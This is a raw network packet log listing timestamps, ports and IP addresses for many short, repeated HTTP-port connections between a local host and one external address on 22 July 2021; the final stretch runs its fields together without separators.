Jul 22, 2021 16:11:30.325128078 CEST  80  49217  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:30.440629005 CEST  80  49217  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:30.440758944 CEST  49217  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:30.774240971 CEST  49217  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:30.775175095 CEST  49218  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:30.827128887 CEST  80  49217  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:30.827234983 CEST  49217  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:30.827613115 CEST  80  49218  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:30.828305006 CEST  49218  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:30.829647064 CEST  49218  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:30.881906033 CEST  80  49218  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:30.989835024 CEST  80  49218  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:30.990179062 CEST  49218  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:31.219461918 CEST  49218  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:31.220468998 CEST  49219  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:31.272092104 CEST  80  49218  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:31.272368908 CEST  80  49219  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:31.272567034 CEST  49218  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:31.272573948 CEST  49219  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:31.273880959 CEST  49219  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:31.326035976 CEST  80  49219  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:32.441133976 CEST  80  49219  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:32.441272020 CEST  49219  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:32.761029959 CEST  49219  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:32.762505054 CEST  49220  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:32.813333035 CEST  80  49219  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:32.813396931 CEST  49219  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:32.814594030 CEST  80  49220  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:32.814656019 CEST  49220  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:32.852581978 CEST  49220  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:32.904819012 CEST  80  49220  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.020685911 CEST  80  49220  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.020755053 CEST  49220  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.391508102 CEST  49220  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.392786980 CEST  49221  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.443830013 CEST  80  49220  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.443974018 CEST  49220  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.445023060 CEST  80  49221  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.445166111 CEST  49221  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.445880890 CEST  49221  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.498141050 CEST  80  49221  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.601244926 CEST  80  49221  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.602744102 CEST  49221  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.825695992 CEST  49221  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.827153921 CEST  49222  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.878082991 CEST  80  49221  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.878216028 CEST  49221  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.879034042 CEST  80  49222  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:33.879142046 CEST  49222  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.880182028 CEST  49222  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:33.932138920 CEST  80  49222  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.034898996 CEST  80  49222  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.035069942 CEST  49222  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.256844044 CEST  49222  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.257792950 CEST  49223  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.308996916 CEST  80  49222  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.309175968 CEST  49222  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.309967041 CEST  80  49223  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.310087919 CEST  49223  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.310890913 CEST  49223  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.363158941 CEST  80  49223  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.467071056 CEST  80  49223  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.467246056 CEST  49223  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.695219040 CEST  49223  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.696635008 CEST  49224  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.747806072 CEST  80  49223  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.748040915 CEST  49223  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.748605013 CEST  80  49224  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.748799086 CEST  49224  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.750005960 CEST  49224  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:34.801923990 CEST  80  49224  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.902857065 CEST  80  49224  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:34.903383017 CEST  49224  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.136362076 CEST  49224  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.137630939 CEST  49225  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.190509081 CEST  80  49224  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.190701008 CEST  49224  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.192359924 CEST  80  49225  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.192526102 CEST  49225  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.193599939 CEST  49225  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.245843887 CEST  80  49225  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.361417055 CEST  80  49225  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.362556934 CEST  49225  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.583460093 CEST  49225  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.584492922 CEST  49226  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.635946035 CEST  80  49225  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.636248112 CEST  49225  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.636604071 CEST  80  49226  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.636758089 CEST  49226  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.637610912 CEST  49226  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:35.690099955 CEST  80  49226  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.809911013 CEST  80  49226  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:35.810250998 CEST  49226  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.037951946 CEST  49226  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.039014101 CEST  49227  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.090490103 CEST  80  49226  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.090626955 CEST  49226  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.091008902 CEST  80  49227  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.091103077 CEST  49227  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.091660023 CEST  49227  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.143683910 CEST  80  49227  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.260988951 CEST  80  49227  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.261192083 CEST  49227  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.492254972 CEST  49227  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.493645906 CEST  49228  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.544698000 CEST  80  49227  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.544951916 CEST  49227  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.546093941 CEST  80  49228  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.546241999 CEST  49228  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.546857119 CEST  49228  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.599342108 CEST  80  49228  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.715334892 CEST  80  49228  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.715542078 CEST  49228  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.941232920 CEST  49228  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.942673922 CEST  49229  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.995888948 CEST  80  49228  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.995913029 CEST  80  49229  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:36.996094942 CEST  49228  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.996138096 CEST  49229  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:36.997251987 CEST  49229  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.049165010 CEST  80  49229  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.152971029 CEST  80  49229  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.153179884 CEST  49229  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.379008055 CEST  49229  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.380461931 CEST  49230  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.431271076 CEST  80  49229  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.431495905 CEST  49229  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.432773113 CEST  80  49230  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.432971954 CEST  49230  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.433851004 CEST  49230  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.486124992 CEST  80  49230  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.590899944 CEST  80  49230  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.591141939 CEST  49230  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.822201967 CEST  49230  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.823539019 CEST  49231  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.874660969 CEST  80  49230  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.874803066 CEST  49230  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.875504971 CEST  80  49231  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:37.875606060 CEST  49231  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.876390934 CEST  49231  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:37.928503990 CEST  80  49231  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.042412996 CEST  80  49231  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.042593002 CEST  49231  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.271862984 CEST  49231  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.273469925 CEST  49232  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.324263096 CEST  80  49231  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.324337959 CEST  49231  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.325607061 CEST  80  49232  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.325694084 CEST  49232  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.326898098 CEST  49232  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.378993988 CEST  80  49232  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.494982004 CEST  80  49232  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.495148897 CEST  49232  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.722326040 CEST  49232  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.723634958 CEST  49233  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.774663925 CEST  80  49232  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.774826050 CEST  49232  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.775962114 CEST  80  49233  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.776066065 CEST  49233  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.776685953 CEST  49233  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:38.828888893 CEST  80  49233  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.932934999 CEST  80  49233  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:38.933146000 CEST  49233  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.163233042 CEST  49233  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.164248943 CEST  49234  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.215643883 CEST  80  49233  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.215779066 CEST  49233  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.216298103 CEST  80  49234  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.216407061 CEST  49234  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.217582941 CEST  49234  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.269922972 CEST  80  49234  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.373692989 CEST  80  49234  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.373876095 CEST  49234  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.594264984 CEST  49234  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.595603943 CEST  49235  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.646369934 CEST  80  49234  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.647545099 CEST  49234  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.648205042 CEST  80  49235  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.649893999 CEST  49235  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.651362896 CEST  49235  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:39.705291986 CEST  80  49235  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.809314013 CEST  80  49235  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:39.809479952 CEST  49235  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.033351898 CEST  49235  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.034888983 CEST  49236  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.086759090 CEST  80  49235  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.086869001 CEST  49235  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.087891102 CEST  80  49236  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.087990046 CEST  49236  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.088572979 CEST  49236  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.141074896 CEST  80  49236  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.245002031 CEST  80  49236  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.245300055 CEST  49236  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.478480101 CEST  49236  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.479444027 CEST  49237  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.530977011 CEST  80  49236  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.531127930 CEST  49236  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.531276941 CEST  80  49237  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.531364918 CEST  49237  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.532183886 CEST  49237  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.584070921 CEST  80  49237  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.698662996 CEST  80  49237  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.698759079 CEST  49237  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.917120934 CEST  49237  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.918066025 CEST  49238  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.970356941 CEST  80  49237  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.970370054 CEST  80  49238  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:40.970510960 CEST  49237  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.970643997 CEST  49238  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:40.971543074 CEST  49238  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.024116993 CEST  80  49238  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.145374060 CEST  80  49238  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.147440910 CEST  49238  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.377279997 CEST  49238  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.380161047 CEST  49239  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.430294037 CEST  80  49238  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.430457115 CEST  49238  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.432435036 CEST  80  49239  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.432852030 CEST  49239  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.434386015 CEST  49239  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.487278938 CEST  80  49239  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.603351116 CEST  80  49239  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.603641033 CEST  49239  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.849433899 CEST  49239  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.850651026 CEST  49240  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.902318954 CEST  80  49239  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.902525902 CEST  49239  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.903218031 CEST  80  49240  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:41.903369904 CEST  49240  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.904114008 CEST  49240  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:41.956429958 CEST  80  49240  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.072706938 CEST  80  49240  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.072761059 CEST  49240  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.292625904 CEST  49240  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.308429003 CEST  49241  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.345105886 CEST  80  49240  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.345237970 CEST  49240  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.360536098 CEST  80  49241  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.360634089 CEST  49241  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.361474991 CEST  49241  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.413448095 CEST  80  49241  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.517798901 CEST  80  49241  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.518026114 CEST  49241  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.746561050 CEST  49242  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.746762991 CEST  49241  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.798888922 CEST  80  49241  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.798952103 CEST  80  49242  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.799128056 CEST  49241  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.799256086 CEST  49242  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.800192118 CEST  49242  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:42.852356911 CEST  80  49242  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.956759930 CEST  80  49242  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:42.956866026 CEST  49242  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.190850019 CEST  49242  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.203995943 CEST  49243  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.243697882 CEST  80  49242  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.243782997 CEST  49242  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.256294966 CEST  80  49243  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.256377935 CEST  49243  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.257241011 CEST  49243  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.309981108 CEST  80  49243  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.413952112 CEST  80  49243  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.414140940 CEST  49243  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.634334087 CEST  49243  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.635463953 CEST  49244  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.686745882 CEST  80  49243  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.686839104 CEST  49243  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.687396049 CEST  80  49244  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.687474966 CEST  49244  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.688730955 CEST  49244  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:43.740981102 CEST  80  49244  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.848915100 CEST  80  49244  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:43.849004984 CEST  49244  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.071983099 CEST  49244  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.073088884 CEST  49245  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.124156952 CEST  80  49244  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.124243975 CEST  49244  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.125274897 CEST  80  49245  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.125344992 CEST  49245  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.126646996 CEST  49245  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.178822041 CEST  80  49245  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.293515921 CEST  80  49245  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.293761969 CEST  49245  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.512105942 CEST  49245  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.513958931 CEST  49246  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.600245953 CEST  80  49245  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.600274086 CEST  80  49246  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.600363970 CEST  49245  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.600414038 CEST  49246  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.601757050 CEST  49246  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:44.653825998 CEST  80  49246  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.768727064 CEST  80  49246  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:44.776138067 CEST  49246  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:45.001123905 CEST  49246  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:45.002545118 CEST  49247  80  192.168.2.22  194.147.115.74
Jul 22, 2021 16:11:45.053556919 CEST  80  49246  194.147.115.74  192.168.2.22
Jul 22, 2021 16:11:45.053693056 CEST  49246  80  192.168.2.22  194.147.115.74
                                                Jul 22, 2021 16:11:45.054757118 CEST8049247194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.054867029 CEST4924780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.055797100 CEST4924780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.108078957 CEST8049247194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.212450981 CEST8049247194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.212654114 CEST4924780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.432915926 CEST4924780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.434859037 CEST4924880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.486357927 CEST8049247194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.486453056 CEST4924780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.487039089 CEST8049248194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.489794970 CEST4924880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.490674019 CEST4924880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.543689966 CEST8049248194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.650993109 CEST8049248194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.652566910 CEST4924880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.868350029 CEST4924980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.868400097 CEST4924880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.923854113 CEST8049249194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.923892021 CEST8049248194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:45.924041986 CEST4924980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.924112082 CEST4924880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.925512075 CEST4924980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:45.977514982 CEST8049249194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:46.091377020 CEST8049249194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:46.091535091 CEST4924980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:46.321886063 CEST4924980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:46.322290897 CEST4925080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:46.373918056 CEST8049249194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:46.374114037 CEST4924980192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:46.374241114 CEST8049250194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:46.374358892 CEST4925080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:46.375261068 CEST4925080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:46.427383900 CEST8049250194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:46.543394089 CEST8049250194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:46.543564081 CEST4925080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:46.768429041 CEST4925080192.168.2.22194.147.115.74
